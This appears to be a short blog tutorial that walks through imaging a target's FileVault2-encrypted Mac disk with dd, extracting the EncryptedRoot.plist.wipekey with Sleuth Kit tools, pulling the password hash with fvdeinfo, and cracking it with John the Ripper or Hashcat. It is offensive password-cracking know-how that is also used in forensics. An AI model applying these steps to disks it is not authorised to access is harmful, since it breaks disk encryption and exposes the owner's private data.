STEP 1: Use dd to extract image of your targets FileVault2 encrypted disk:
sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd
conv = noerr, sync
STEP 2: Install fvde2john from Here
(https://github.com/kholia/fvde2john)STEP 3: Use hdiutil to attach to dd image:
hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd
STEP 4: Obtain the EncryptedRoot.plist.wipekey from "Recovery HD" partition
https://github.com/libyal/libfvde/wiki/Mounting#obtaining-encryptedrootplistwipekey
mmls /Volumes/path/to/filevault_image.dd
fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot
icat -o 50450752 image.raw 130 > EncryptedRoot.plist.wipekey
STEP 5: Verify and note the disk mount point for Apple_Corestorage:
diskutil list
.../dev/disk3s2 Apple_Corestorage
STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:
sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2
Will return hash
FINAL STEP: Load this hash into JTR or Hashcat to crack it:
john --format=FVDE-opencl --wordlist=dict.txt hash.txt
hashcat -a 0 -m 16700 hash.txt dict.txt
🔺Share And Support Us🔻
Comments
Post a Comment